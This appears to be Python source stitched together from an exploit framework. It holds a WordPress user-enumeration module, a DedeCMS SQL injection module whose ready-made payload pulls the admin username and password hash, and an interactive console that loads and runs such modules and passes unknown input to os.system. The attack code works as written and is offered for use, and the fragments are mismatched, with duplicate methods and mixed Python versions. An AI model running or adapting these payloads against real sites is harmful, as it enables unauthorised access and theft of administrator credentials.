def exploit(self):
'''
漏洞利用的核心代码, 在此函数中完成漏洞利用
'''
Log.info("Lauching the exploition...")
host = self.get_config("remote_host")
port = int(self.get_config("remote_port"))
url = "http://%s:%d/wp-json/wp/v2/users/" % (host, port)
try:
response = requests.get(url)
if response.status_code == 200:
Log.success("Exploit success!")
content = response.content
print "%s" % (color.cyan("ID\tUser\t\tDescription"))
for user in json.loads(content)[::-1]:
username = user["name"]
if len(username) > 8:
print "%s\t%s\t%s" % (user["id"], user["name"],
user["description"])
else:
print "%s\t%s\t\t%s" % (user["id"], user["name"],
user["description"])
return True
else:
Log.error("Exploit Failed!")
return False
except Exception as e:
Log.error(str(e))
return False
def exploit(self):
'''
漏洞利用的核心代码, 在此函数中完成漏洞利用
'''
Log.info("Lauching the exploition...")
host = self.get_config("remote_host")
port = self.get_config("remote_port")
url = "http://%s:%d/%s" % (host, port, '''plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294''')
Log.info("Url: %s" % (url))
try:
response = requests.get(url)
if response.status_code == 200:
content = response.content
if "<h2>" not in content:
Log.error("Exploit Failed!")
return False
data = response.content.split("<h2>")[1].split("</h2>")[0].split("\\|")
if len(data) != 2:
Log.error("Exploit Failed!")
return False
Log.success("Exploit success!")
username = data[0]
password = data[1]
print "%s" % (color.cyan("Username\tHash"))
print "%s" % (color.blue("%s\t%s" % (username, password)))
return True
else:
return False
except Exception as e:
Log.error(str(e))
return False
def main():
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
banner.banner()
LOCAL_COMMAND_FLAG = True
CONTEXT = reset_context()
while True:
command = (input("[%s]=> " % (color.red(CONTEXT))) or "help")
if command == "h" or command == "help" or command == "?":
main_help()
elif command == "version":
Log.Log.info("Version: 0.0.1")
elif command == "show":
print("%s" % (color.purple("------\t\t------")))
print("%s" % (color.purple("Vendor\t\tModule")))
print("%s" % (color.purple("------\t\t------")))
exploit_path = "./exploit/"
vendors = os.listdir(exploit_path)
for vendor in vendors:
full_path = exploit_path + vendor
if os.path.isdir(full_path):
# Log.Log.info("%s" % ("-" * 0x20))
# Log.Log.info("Vendor: %s" % (vendor))
exploit_files = os.listdir(full_path)
number = 0
for exploit_file in exploit_files:
if exploit_file.endswith(".py") and exploit_file != "__init__.py":
# Log.Log.info("%s => exploit.%s.%s" % (exploit_file, vendor, exploit_file.replace(".py", "")))
if len(vendor) > 8:
print("%s" % (color.cyan("%s\t%s" % (vendor, exploit_file.replace(".py", "")))))
else:
print("%s" % (color.cyan("%s\t\t%s" % (vendor, exploit_file.replace(".py", "")))))
number += 1
# Log.Log.info("%d exploits" % (number))
print("%s" % (color.purple("---------")))
print("%s" % (color.purple(" Example")))
print("%s" % (color.purple("---------")))
print("%s" % (color.cyan("use exploit.%s.%s" % (vendor, exploit_file.replace(".py", "")))))
elif command.startswith("use "):
module_name = command.split(" ")[1]
Log.Log.info("Loading module: %s" % (module_name))
try:
module = importlib.import_module(module_name)
except Exception as e:
Log.Log.error(str(e))
continue
CONTEXT = module_name
exploit = module.Exploit()
exploit.show_info()
Log.Log.info("%s" % ("-" * 0x40))
exploit.show_options()
while True:
module_command = (input("[%s]=> " % (color.red(CONTEXT))) or "help")
if module_command == "help":
main_help()
continue
if module_command.startswith("set "):
if len(module_command.split(" ")) == 3:
key = module_command.split(" ")[1]
value = module_command.split(" ")[2]
exploit.set_config(key, value)
else:
Log.Log.error("Check your input!")
Log.Log.info("Example: \n\tset [KEY] [VALUE]")
elif module_command == "options":
exploit.show_options()
elif module_command == "info":
exploit.show_info()
elif module_command == "exploit":
try:
exploit.exploit()
except Exception as e:
Log.Log.error(str(e))
elif module_command == "quit" or module_command == "q" or module_command == "exit" or module_command == "back":
break
else:
main_help()
CONTEXT = reset_context()
elif command == "q" or command == "quit" or command == "exit":
Log.Log.info("Quiting...")
break
else:
Log.Log.error("Unsupported function!")
if LOCAL_COMMAND_FLAG == True:
Log.Log.info("Executing command on localhost...")
os.system(command)
